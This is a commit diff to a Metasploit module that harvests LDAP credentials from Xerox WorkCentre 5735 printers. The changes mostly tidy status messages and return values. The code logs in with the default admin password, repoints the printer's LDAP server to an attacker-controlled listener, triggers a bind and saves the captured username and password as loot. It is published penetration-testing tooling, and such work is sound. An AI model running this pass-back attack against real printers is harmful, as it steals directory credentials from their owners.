Final changes

wchen-r7 · wchen-r7 · commit 470a0673845b · 2014-10-30T13:51:44.000-05:00
diff --git a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb
@@ -1,7 +1,8 @@
 #
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+
 require 'rex/proto/http'
 require 'msf/core'
 
@@ -12,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => 'Xerox workcentre 5735 LDAP service redential extractor',
+      'Name'           => 'Xerox Workcentre 5735 LDAP Service Redential Extractor',
       'Description'    => %{
         This module extract the printers LDAP user and password from Xerox workcentre 5735.
       },
@@ -28,19 +29,19 @@ def initialize(info={})
       [
         OptBool.new('SSL', [true, 'Negotiate SSL for outgoing connections', false]),
         OptString.new('PASSWORD', [true, 'Password to access administrative interface. Defaults to 1111', '1111']),
-        OptInt.new('RPORT', [true, 'The target port on the remote printer. Defaults to 80', 80]),
+        OptPort.new('RPORT', [true, 'The target port on the remote printer. Defaults to 80', 80]),
         OptInt.new('TIMEOUT', [true, 'Timeout for printer connection probe.', 20]),
         OptInt.new('TCPDELAY', [true, 'Number of seconds the tcp server will wait before termination.', 20]),
         OptString.new('NewLDAPServer', [true, 'The IP address of the LDAP server you want the printer to connect back to.'])
       ], self.class)
   end
 
   def run
-    print_status("Attempting to extract LDAP username and password for the host at #{rhost}")
+    print_status("#{peer} - Attempting to extract LDAP username and password...")
 
     @auth_cookie = default_page
     if @auth_cookie.blank?
-      print_status("Unable to get authentication cookie from #{rhost}")
+      print_status("#{peer} - Unable to get authentication cookie from #{rhost}")
       return
     end
 
@@ -55,10 +56,10 @@ def run
 
     start_listener
     unless @data
-      print_error('Failed to start listiner or the printer did not send us the creds. :(')
+      print_error("#{peer} - Failed to start listiner or the printer did not send us the creds. :(")
       status = restore_ldap_server
       unless status
-        print_error('Failed to restore old LDAP server. Please manually restore')
+        print_error("#{peer} - Failed to restore old LDAP server. Please manually restore")
       end
       return
     end
@@ -69,25 +70,25 @@ def run
     ldap_binary_creds = @data.scan(/(\w+\\\w+).\s*(.+)/).flatten
     ldap_creds = "#{ldap_binary_creds[0]}:#{ldap_binary_creds[1]}"
 
-    #Woot we got creds so lets save them.#
-    print_good("The following creds were capured: #{ldap_creds}")
+    # Woot we got creds so lets save them.#
+    print_good("#{peer} - The following creds were capured: #{ldap_creds}")
     loot_name     = 'ldap.cp.creds'
     loot_type     = 'text/plain'
     loot_filename = 'ldap-creds.text'
     loot_desc     = 'LDAP Pass-back Harvester'
     p = store_loot(loot_name, loot_type, datastore['RHOST'], @data, loot_filename, loot_desc)
-    print_status("Credentials saved in: #{p}")
+    print_status("#{peer} - Credentials saved in: #{p}")
 
     register_creds('ldap', rhost, @ldap_port, ldap_binary_creds[0], ldap_binary_creds[1])
   end
 
   def default_page
-    default_page = '/header.php?tab=status'
+    page = '/header.php?tab=status'
     method = 'GET'
-    res = make_request(default_page, method, '')
+    res = make_request(page, method, '')
     if res.blank? || res.code != 200
-      print_error("Failed to connect to #{rhost}. Please check the printers IP address.")
-      return false
+      print_error("#{peer} - Failed to connect to #{rhost}. Please check the printers IP address.")
+      return ''
     end
     res.get_cookies
   end
@@ -108,8 +109,8 @@ def login
 
     res = make_request(login_page, method, login_post_data)
     if res.blank? || res.code != 200
-      print_error("Failed to login on #{rhost}. Please check the password for the Administrator account ")
-      return false
+      print_error("#{peer} - Failed to login. Please check the password for the Administrator account")
+      return nil
     end
     res.code
   end
@@ -125,10 +126,10 @@ def ldap_server_info
     ldap_port_number = ldap_port_settings.scan(/valPrt_1\[2\] = (\d+)/).flatten
     @ldap_server = "#{ldap_server_ip[0]}.#{ldap_server_ip[1]}.#{ldap_server_ip[2]}.#{ldap_server_ip[3]}"
     @ldap_port = ldap_port_number[0]
-    print_status("Found LDAP server: #{@ldap_server}")
+    print_status("#{peer} - LDAP server: #{@ldap_server}")
     unless res.code == 200 || res.blank?
-      print_error("Failed to get ldap data from #{rhost}.")
-      return false
+      print_error("#{peer} - Failed to get LDAP data.")
+      return nil
     end
     res.code
   end
@@ -148,11 +149,11 @@ def update_ldap_server
     ldap_update_post *= '&'
     method = 'POST'
 
-    print_status("Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}")
+    print_status("#{peer} - Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}")
     res = make_request(ldap_update_page, method, ldap_update_post)
     if res.blank? || res.code != 200
-      print_error("Failed to update ldap server. Please check the host: #{rhost}")
-      return false
+      print_error("#{peer} - Failed to update LDAP server. Please check the host: #{rhost}")
+      return nil
     end
     res.code
   end
@@ -183,7 +184,7 @@ def trigger_ldap_request
     ldap_trigger_post *= '&'
     method = 'POST'
 
-    print_status('Triggering LDAP reqeust')
+    print_status("#{peer} - Triggering LDAP reqeust")
     res = make_request(ldap_trigger_page, method, ldap_trigger_post)
     res.code
   end
@@ -242,16 +243,18 @@ def restore_ldap_server
     ldap_restore_post *= '&'
     method = 'POST'
 
-    print_status("Restoring LDAP server: #{@ldap_server}")
+    print_status("#{peer} - Restoring LDAP server: #{@ldap_server}")
     res = make_request(ldap_restore_page, method, ldap_restore_post)
     if res.blank? || res.code != 200
-      print_error("Failed to restore LDAP server: #{@ldap_server}. Please fix manually")
-      return false
+      print_error("#{peer} - Failed to restore LDAP server: #{@ldap_server}. Please fix manually")
+      return nil
     end
     res.code
   end
 
   def make_request(page, method, post_data)
+    res = nil
+
     begin
       res = send_request_cgi(
       {
@@ -260,11 +263,12 @@ def make_request(page, method, post_data)
         'cookie'    => @auth_cookie,
         'data'      => post_data
       }, datastore['TIMEOUT'].to_i)
-      return res
+
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - Connection failed.")
-      return false
+      print_error("#{peer} - Connection failed.")
     end
+
+    res
   end
 
   def register_creds(service_name, remote_host, remote_port, username, password)
